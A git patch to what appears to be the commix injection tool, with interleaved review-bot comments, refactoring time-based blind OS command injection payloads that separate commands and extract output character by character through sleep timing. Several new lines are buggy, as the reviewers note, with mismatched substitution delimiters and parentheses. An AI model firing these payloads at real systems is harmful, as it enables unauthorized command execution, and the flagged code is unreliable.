From 79909148b3aa7e45d0d2f09e08d4c2d7638cd832 Mon Sep 17 00:00:00 2001 From: stasinopoulos Date: Mon, 13 Jan 2025 08:29:40 +0200 Subject: [PATCH] mprovement regarding tamper script "backticks.py" for supporting time-related techniques (i.e. "time-based", "tempfile-based"). --- doc/CHANGELOG.md | 3 + .../techniques/time_based/tb_payloads.py | 256 ++++++++--------- src/core/injections/controller/checks.py | 8 +- src/core/injections/controller/controller.py | 30 +- src/core/injections/controller/handler.py | 10 +- .../techniques/classic/cb_payloads.py | 101 ++----- .../techniques/file_based/fb_payloads.py | 12 +- .../techniques/tempfile_based/tfb_payloads.py | 258 ++++++++---------- src/core/tamper/backticks.py | 7 +- src/utils/settings.py | 21 +- 10 files changed, 324 insertions(+), 382 deletions(-) diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index e9020a81f0..3738be395f 100755 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -1,3 +1,6 @@ +## Version 4.1 (TBA) +* Revised: Improvement regarding tamper script "backticks.py" for supporting time-related techniques (i.e. "time-based", "tempfile-based"). + ## Version 4.0 (2024-12-20) * Fixed: Multiple bug-fixes regarding several reported unhandled exceptions. * Revised: Minor bug-fix regarding tamper script "backticks.py" diff --git a/src/core/injections/blind/techniques/time_based/tb_payloads.py b/src/core/injections/blind/techniques/time_based/tb_payloads.py index 140aa9111b..37a49cc14c 100755 --- a/src/core/injections/blind/techniques/time_based/tb_payloads.py +++ b/src/core/injections/blind/techniques/time_based/tb_payloads.py 
@@ -34,8 +34,8 @@ def decision(separator, TAG, output_length, timesec, http_request_method): "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c \"powershell.exe -InputFormat none write '" + TAG + "'.length\"') " 
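Review bot: The removed `separator = _urllib.parse.quote(separator)` is kept as a commented-out line `#separator = _urllib.parse.quote(separator)` in the new `&&` branch instead of being deleted; since the condition now compares against `_urllib.parse.quote("&&")`, the old statement is obsolete and the comment only misleads. The same leftover appears in every `&&` branch of this file (the hunks through the fp_result_alter_shell one) and in the checks.py, controller.py and handler.py hunks, so one sweep should remove them all. What the new condition relies on is not stated anywhere — presumably the caller now passes the separator already URL-encoded; a one-line comment such as `# separator arrives URL-encoded ("%26%26"), hence the quoted comparison` would record that assumption. decision() starts before this hunk and continues past it.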
@@ -46,38 +46,35 @@ def decision(separator, TAG, output_length, timesec, http_request_method): else: if separator == ";" or separator == "%0a": payload = (separator + - "str=$(echo " + TAG + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(output_length) + " -ne $str1 ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0 " + separator + - "str=$(echo " + TAG + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + "[ " + str(output_length) + " -eq $str1 ]" + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(output_length) + " -ne $(echo " + TAG + settings.SINGLE_WHITESPACE + - pipe + "tr -d '\\n' " + pipe + "wc -c) ] " + separator + - "sleep " + str(timesec) + - separator + "[ " + str(output_length) + " -ne " + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.SINGLE_WHITESPACE + + pipe + "tr -d '\\n' " + pipe + "wc -c" + settings.CMD_SUB_SUFFIX + " ]" + separator + + "sleep " + str(timesec) ) else: pass 
@@ -96,40 +93,38 @@ def decision_alter_shell(separator, TAG, output_length, timesec, http_request_me "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(output_length) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(output_length) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a": payload = (separator + # Find the length of the output, using readline(). 
- "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(output_length) + " -ne ${str1} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). 
- "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\"" + settings.CMD_SUB_SUFFIX + separator + "[ " + str(output_length) + " -eq ${str1} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) @@ -138,9 +133,8 @@ def decision_alter_shell(separator, TAG, output_length, timesec, http_request_me pipe = "|" payload = (pipe + # Find the length of the output, using readline(). - "[ " + str(output_length) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(output_length) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\")] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: pass 
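Review bot: `settings.CMD_SUB_SUFFIX` has been substituted for the `)` that closes the Python call in `time.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\""`; that parenthesis belongs to the interpreter's `-c` argument, not to the shell command substitution, so it should stay a literal, `"time.sleep(" + str(timesec) + ")\"" + settings.CMD_SUB_SUFFIX`. The same substitution sits in the Windows branches of this hunk (`str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX`), where no `CMD_SUB_PREFIX` opens anything at all, and in the `||` branch the opposite inconsistency appears: `settings.CMD_SUB_PREFIX` opens the substitution but `time.sleep(0)\") "` still closes it with a literal `)`. The identical pattern recurs in the cmd_execution_alter_shell, get_char_alter_shell and fp_result_alter_shell hunks, so it is worth one consistent pass. Because the checks.py hunk skips backticks.py under `--alter-shell`, the constants presumably still equal `$(` and `)` on these paths today, which is why nothing visibly breaks; a comment stating that assumption on the function would stop the next refactor from relying on it.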
@@ -171,8 +165,8 @@ def cmd_execution(separator, cmd, output_length, timesec, http_request_method): "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c \"" + 
@@ -183,30 +177,31 @@ def cmd_execution(separator, cmd, output_length, timesec, http_request_method): else: settings.USER_APPLIED_CMD = cmd + cmd_exec = cmd + if settings.USE_BACKTICKS: + cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX if separator == ";" or separator == "%0a": payload = (separator + - "str=\"$(echo $(" + cmd + "))\"" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd_exec + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str}" + separator + - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(output_length) + " -ne $str1 ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0" + separator + - "str=$(echo $(" + cmd + "))" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd_exec + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length $str)" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length $str)" + separator + #"str1=${%23str} " + separator + "[ " + str(output_length) + " -eq $str1 ]" + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) 
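Review bot: In the `&&` branch the new line `"str1=" + settings.CMD_SUB_PREFIX + "expr length $str)" + separator` opens the substitution with the constant but hard-codes `)` as its close, unlike the `;` branch a few lines above which uses `settings.CMD_SUB_SUFFIX`; it should read `"str1=" + settings.CMD_SUB_PREFIX + "expr length $str" + settings.CMD_SUB_SUFFIX + separator +`. The new `cmd_exec` assignment is also undocumented: when `settings.USE_BACKTICKS` is set it is already wrapped in `CMD_SUB_PREFIX`/`CMD_SUB_SUFFIX`, and the payload then wraps it a second time inside `echo`, so the nesting differs between the two modes — a comment such as `# cmd_exec is pre-wrapped when backticks are used; the outer echo substitution adds a second level` would make the intent explicit, and the same applies to the cmd_exec block in the get_char hunk.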
@@ -214,10 +209,9 @@ def cmd_execution(separator, cmd, output_length, timesec, http_request_method): elif separator == "||" : pipe = "|" payload = (pipe + - "[ " +str(output_length)+ " -ne $(echo -n \"$(" + cmd + ")\" " + - pipe + "tr -d '\\n' " + pipe + "wc -c) ] " + separator + - "sleep " + str(timesec) + - separator + "[ " +str(output_length)+ " -ne " + settings.CMD_SUB_PREFIX + "echo -n \"" + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + "\" " + + pipe + "tr -d '\\n' " + pipe + "wc -c" + settings.CMD_SUB_SUFFIX + " ]" + separator + + "sleep " + str(timesec) ) else: pass 
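Review bot: The `||` branch wraps the bare `cmd` (`settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX`) while the `;` and `&&` branches of the previous hunk wrap `cmd_exec`, which the new code builds precisely so that the backticks mode is applied uniformly; one of the two is inconsistent and, from the hunk alone, it is not clear which is intended. If `cmd_exec` is the canonical form, this line should use it too: `"[ " +str(output_length)+ " -ne " + settings.CMD_SUB_PREFIX + "echo -n \"" + cmd_exec + "\" " +`. The same mismatch exists in the `||` branch of get_char, where `cmd_exec` is computed but the `||` payload still reads `cmd`. cmd_execution() continues beyond this hunk.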
@@ -235,40 +229,38 @@ def cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_reque "for /f \"tokens=*\" %i in ('cmd /c " + cmd + "') do if %i==" + str(output_length) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c " + cmd + "') do if %i==" + str(output_length) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a": payload = (separator + # Find the length of the output, using readline(). 
- "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'$(echo $(" + cmd + "))\'))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'))\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(output_length) + " -ne ${str1} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi " + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi " ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + # Find the length of the output, using readline(). 
- "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'$(echo $(" + cmd + "))\'))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'))\"" + settings.CMD_SUB_SUFFIX + separator + "[ " + str(output_length) + " -eq ${str1} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\") " ) separator = _urllib.parse.unquote(separator) @@ -277,9 +269,8 @@ def cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_reque pipe = "|" payload = (pipe + # Find the length of the output, using readline(). - "[ " + str(output_length) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'$(echo $(" + cmd + "))\'))\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(output_length) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'))\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: pass 
@@ -307,8 +298,8 @@ def get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_met "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c \"powershell.exe -InputFormat none write ([int][char](([string](cmd /c " + 
@@ -317,38 +308,39 @@ def get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_met ) else: + cmd_exec = cmd + if settings.USE_BACKTICKS: + cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX settings.USER_APPLIED_CMD = cmd if separator == ";" or separator == "%0a" : payload = (separator + # Grab the execution output. - "cmd=\"$(echo $(" + cmd + "))\"" + separator + + "cmd=\"" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd_exec + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "\"" + separator + # Export char-by-char the execution output. - "char=$(expr substr \"$cmd\" " + str(num_of_chars) + " 1)" + separator + + "char=" + settings.CMD_SUB_PREFIX + "expr substr \"$cmd\" " + str(num_of_chars) + " 1" + settings.CMD_SUB_SUFFIX + separator + # Transform from Ascii to Decimal. - "str=$(printf '%d' \"'$char'\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "printf '%d' \"'$char'\"" + settings.CMD_SUB_SUFFIX + separator + # Perform the time-based comparisons "if [ " + str(ascii_char) + " -ne $str ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi " + - separator + "fi " ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0 " + separator + # Grab the execution output. - "cmd=\"$(echo $(" + cmd + "))\"" + separator + + "cmd=\"" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd_exec + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "\"" + separator + # Export char-by-char the execution output. - "char=$(expr substr \"$cmd\" " + str(num_of_chars) + " 1)" + separator + + "char=" + settings.CMD_SUB_PREFIX + "expr substr \"$cmd\" " + str(num_of_chars) + " 1" + settings.CMD_SUB_SUFFIX + separator + # Transform from Ascii to Decimal. 
- "str=$(printf '%d' \"'$char'\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "printf '%d' \"'$char'\"" + settings.CMD_SUB_SUFFIX + separator + # Perform the time-based comparisons "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) @@ -356,11 +348,10 @@ def get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_met elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(" + cmd + pipe + "tr -d '\\n'" + + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + cmd + pipe + "tr -d '\\n'" + pipe + "cut -c " + str(num_of_chars) + pipe + "od -N 1 -i" + - pipe + "head -1" + pipe + "awk '{print$2}') ] " + separator + - "sleep " + str(timesec) + - separator + pipe + "head -1" + pipe + "awk '{print$2}'" + settings.CMD_SUB_SUFFIX + " ]" + separator + + "sleep " + str(timesec) ) else: pass 
@@ -379,38 +370,36 @@ def get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a": payload = (separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'$(echo $(" + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + 
settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'$(echo $(" + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\")" + separator + - "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) 
@@ -418,9 +407,8 @@ def get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'$(echo $(" + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: @@ -451,8 +439,8 @@ def fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_me "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c \"" + 
@@ -464,23 +452,21 @@ def fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_me else: if separator == ";" or separator == "%0a": payload = (separator + - "str=\"$(" + cmd + ")\"" + separator + + "str=\"" + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + "\"" + separator + "if [ " + str(ascii_char) + " -ne $str ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0 " + separator + - "str=\"$(" + cmd + ")\" " + separator + + "str=\"" + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + "\" " + separator + "[ " + str(ascii_char) + " -eq $str ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) @@ -489,9 +475,8 @@ def fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_me elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne \"$(" + cmd + ")\" ] " + separator + - "sleep " + str(timesec) + - separator + "[ " + str(ascii_char) + " -ne \"" + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + "\" ]" + separator + + "sleep " + str(timesec) ) else: pass 
